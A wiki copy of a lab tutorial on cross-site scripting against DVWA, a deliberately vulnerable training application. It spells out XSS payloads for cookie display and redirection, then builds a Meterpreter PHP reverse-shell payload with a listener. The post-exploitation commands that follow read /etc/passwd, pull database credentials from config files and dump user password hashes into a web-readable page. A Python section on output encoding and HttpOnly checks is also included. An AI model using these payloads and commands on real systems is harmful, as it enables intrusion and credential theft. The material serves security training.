DVWA: XSS

From OnnoWiki

Source: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html

Objectives

  • Test a basic cross site scripting (XSS) attack
  • Test an iframe cross site scripting (XSS) attack
  • Test a cookie cross site scripting (XSS) attack
  • Create a php/meterpreter/reverse_tcp payload
  • Start the php/meterpreter/reverse_tcp listener
  • Upload the PHP payload to the DVWA Upload screen
  • Test a PHP Payload cross site scripting (XSS) attack


On the DVWA side

Check the IP address

ifconfig


Fix Stored Cross Site Scripting (XSS) Comment Box

Edit index.php

cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/
vi index.php

Search for the keyword mtxMessage and change maxlength=50

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>

to maxlength=250

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>

On the Kali Linux side

Check the Kali Linux IP address

ifconfig -a

Enable JavaScript in the browser

Open Firefox
Preferences > Content > Uncheck - Block pop-up windows

Log in to DVWA

  • Login
  • DVWA Security > Low

XSS Stored Basic Exploit Test

  • Click > XSS (Stored)
  • In Name, enter "Test 1"
  • In Message, enter "<script>alert("This is a XSS Exploit Test")</script>"
  • Click > Sign Guestbook

XSS Stored IFRAME Exploit Test

  • Reset the DVWA database so that the XSS stored earlier no longer appears.
  • Click > XSS (Stored)
  • In Name, enter "Test 2"
  • In Message, enter "<iframe src="http://www.cnn.com"></iframe>"
  • Click > Sign Guestbook

CNN now appears embedded below the "Test 2" entry.

   This is a powerful exploit because an attacker could use SET to create a malicious cloned website and embed it here.
       e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images

XSS Stored COOKIE Exploit Test

  • Reset the DVWA database so that the XSS stored earlier no longer appears.
  • Click > XSS (Stored)
  • In Name, enter "Test 3"
  • In Message, enter "<script>alert(document.cookie)</script>"
  • Click > Sign Guestbook


   Below is the cookie/session that the web server establishes with the current browser session.
   An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
   Imagine if this were a bank website: every time a user logged in, their cookie information could be sent to a remote location.
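As an added defender-side example (not part of the original lesson or of DVWA's own code), the Python below shows why the three guestbook messages above become live markup at DVWA's Low level and how output encoding neutralises them; html.escape(..., quote=True) stands in for PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), and cookie_exposed_to_script covers the HttpOnly point behind Test 3. The guestbook rows and Set-Cookie values are constructed sample data; the function names are my own.

```python
import html
import re

# Constructed copies of the three guestbook messages submitted in the tests above.
PAYLOADS = {
    "Test 1": '<script>alert("This is a XSS Exploit Test")</script>',
    "Test 2": '<iframe src="http://www.cnn.com"></iframe>',
    "Test 3": "<script>alert(document.cookie)</script>",
}

# Tags that, if they reach the page unencoded, run or load content in the visitor's browser.
ACTIVE_TAG_RE = re.compile(r"<\s*/?\s*(script|iframe|img|svg|object|embed)\b", re.I)

def render_low(name, message):
    """DVWA Low behaviour: the stored fields are echoed into the HTML as-is,
    so any tag in the message becomes live markup for every later visitor."""
    return f"<div id='guestbook_comments'>Name: {name}<br />Message: {message}<br /></div>"

def render_hardened(name, message):
    """Output-encode both fields where they enter HTML. html.escape with quote=True
    does what PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8') does: '<', '>', '&',
    '"' and "'" become entities, so the stored text can no longer open a tag."""
    return "<div id='guestbook_comments'>Name: {}<br />Message: {}<br /></div>".format(
        html.escape(name, quote=True), html.escape(message, quote=True))

def has_active_markup(fragment):
    """True if the rendered fragment still contains a tag the browser would act on."""
    return ACTIVE_TAG_RE.search(fragment) is not None

def flag_guestbook_rows(rows):
    """Triage helper for the stored guestbook table: names of rows whose message
    carries active markup, i.e. the entries to review after an incident."""
    return [name for name, message in rows if has_active_markup(message)]

def cookie_exposed_to_script(set_cookie):
    """Test 3 only works because document.cookie can read the session cookie.
    Parses a Set-Cookie header value (constructed samples below) and reports
    whether page script could read it, i.e. the HttpOnly attribute is missing."""
    attrs = [part.strip().lower() for part in set_cookie.split(";")[1:]]
    return "httponly" not in attrs

if __name__ == "__main__":
    for name, message in PAYLOADS.items():
        print(name, "low:", has_active_markup(render_low(name, message)),
              "hardened:", has_active_markup(render_hardened(name, message)))
    print("rows to review:", flag_guestbook_rows([*PAYLOADS.items(), ("Alice", "nice site")]))
    print("session readable by script:", cookie_exposed_to_script("PHPSESSID=abc123; path=/"))
```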


Build PHP msfpayload

   mkdir -p /root/backdoor
   cd /root/backdoor
   msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php
   ls -l FORUM_BUG.php


   Select "Upload" from the left navigation menu, click Browse, and upload FORUM_BUG.php.

Start msfconsole

   msfconsole

   use exploit/multi/handler
   set PAYLOAD php/meterpreter/reverse_tcp
   set LHOST 192.168.1.105
   set LPORT 4444
   exploit


XSS Stored window.location Exploit Test

  • Reset the DVWA database so that the XSS stored earlier no longer appears.
  • Click > XSS (Stored)
  • In Name, enter "Test 4"
  • In Message, enter:

   <script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php" </script>
       Replace 192.168.1.106 with the IP address obtained from Fedora 14 in (Section 3, Step 3).

  • Click > Sign Guestbook
  • Click OK when the Test 1 Message is displayed

shell
   Establishes a "sh" shell.

tail /etc/passwd
   This produces a potential prospect list for an ssh brute force attack.

whoami
   Displays the name of the current user.

grep apache /etc/passwd
   The goal of this command is to obtain the home directory of the apache user.

find /var/www/* -print | grep config
   This lists all the configuration files under the /var/www directory.

grep "db_" /var/www/html/dvwa/config/config.inc.php
   This produces the database name, username, and password needed to log in to the MySQL database.

echo "use dvwa; show tables;" | mysql -uroot -p123456
   This command produces the table list of the dvwa database.

echo "use dvwa; desc users;" | mysql -uroot -p123456
   This command describes the columns of the users table in the dvwa database.

echo "select user,password from dvwa.users;" | mysql -uroot -p123456
   This command displays the user and password information for each user in the dvwa.users table.


echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
   Places the opening HTML <pre> tag in the xss.html file; <pre> preserves the formatting of the query output.

echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/dvwa/hackable/uploads/xss.html
   Places the user and password columns of the dvwa.users table in the xss.html file.

echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
   Places the closing </pre> tag in the xss.html file.

echo "Your Name" >> /var/www/html/dvwa/hackable/uploads/xss.html
   Replace the string "Your Name" with your actual name.

date >> /var/www/html/dvwa/hackable/uploads/xss.html
   Appends the current date and time to the xss.html file.



   On BackTrack, enter the URI below in Firefox:
       http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html
           Replace the above IP address with the IP address obtained in (Section 3, Step 3).

References